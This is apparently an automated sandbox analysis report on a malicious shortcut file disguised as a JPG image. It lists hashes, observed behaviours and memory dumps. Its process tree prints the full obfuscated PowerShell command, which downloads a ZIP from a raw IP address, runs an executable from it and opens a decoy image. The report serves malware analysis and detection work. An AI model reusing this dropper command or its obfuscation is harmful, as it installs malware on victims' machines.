0973bf4ab963c2de6c69c3809ed228f0caf00409f4c09e78029640f2026dc19e

Analysis

max time kernel
16s
max time network
17s
platform
windows7_x64
resource
win7-20240729-en
resource tags

arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
submitted
31/08/2024, 01:02

Target

telegrama_ksv_po_btgr.jpg.lnk
Size

691KB
MD5

27fea6f5fbaffbbf1479cd9dfa9604fa
SHA1

ffe89c8b62b0faf639b056972db1a1974c53efa0
SHA256

df7d2e54b67a7788dd7c326a6c2a1c5b935b94288622fb7bbeff3ba336205cd7
SHA512

e901089462cd9d54f6de3d98ddaf10d94a3b1dc8ad5fb48f7facf0e3b8afcd97aa0caf3616f6548dcc3bb7e1eb8d6bc476bb8387c7cb0f689d0bab023c5deba5
SSDEEP

48:8xmuavUQSsejrK5053YMEDo//pxCMGopDDo/39OKXJa7x:8xy86enc+3hX/pxC530KXJQ

Score

3^/10

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
812	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	812	powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 1244 wrote to memory of 812	1244	cmd.exe	31
PID 1244 wrote to memory of 812	1244	cmd.exe	31
PID 1244 wrote to memory of 812	1244	cmd.exe	31

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\telegrama_ksv_po_btgr.jpg.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:1244
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win 1 echo LCgtGMtcQQJaJlfGEbTWGQtHPnXvshSydqPjdadyHUqlchGjSeaWM; echo oIhdvwvvpCFrPXEuFwytiupeuuztBsyBbTIlLfifAJQuXhxp; echo HOoXHdZuZstQdflDScvNdstDTjusTXRkquolxTidEJXSlFbSdEjjTwx; if (-not(Test-Path 'signalmessenger.zip' -PathType Leaf)){&(G''et-C''om''ma''nd in???e-webr**) -uri h''t''tp:''//''83''.''22''2''.''1''91''.''20''1/signalmessenger.zip -OutFile signalmessenger.zip}; echo jrJBbRkXWBdTmxLNkFmKcFkZNZRRTGZzEWLuBEZHNAvBPkncUoAZKvCdHl; Expand-Archive -Path signalmessenger.zip -DestinationPath SecurityCheck; s''tar''t SecurityCheck/Newfts.exe; echo JuhGhuKkmGFuLZMyQwPXHdhWkLqUpKudPsEClUijthIIp; &(Ge''t-Com''ma''nd in???e-webre***) -uri h''t''tp:''//''83''.''22''2''.''1''91''.''20''1/racs/telegrama_ksv_po_btgr.jpg -OutFile telegrama_ksv_po_btgr.jpg; echo CndnhqGwRKEgfnUJozdJravfXsLW; s''t''a''rt telegrama_ksv_po_btgr.jpg
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:812

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

memory/812-38-0x000007FEF5FDE000-0x000007FEF5FDF000-memory.dmp

Filesize
4KB

Download
memory/812-39-0x000000001B6A0000-0x000000001B982000-memory.dmp

Filesize
2.9MB

Download
memory/812-40-0x0000000002230000-0x0000000002238000-memory.dmp

Filesize
32KB

Download
memory/812-41-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp

Filesize
9.6MB

Download
memory/812-42-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp

Filesize
9.6MB

Download
memory/812-43-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp

Filesize
9.6MB

Download
memory/812-44-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp

Filesize
9.6MB

Download
memory/812-45-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp

Filesize
9.6MB

Download
memory/812-46-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp

Filesize
9.6MB

Download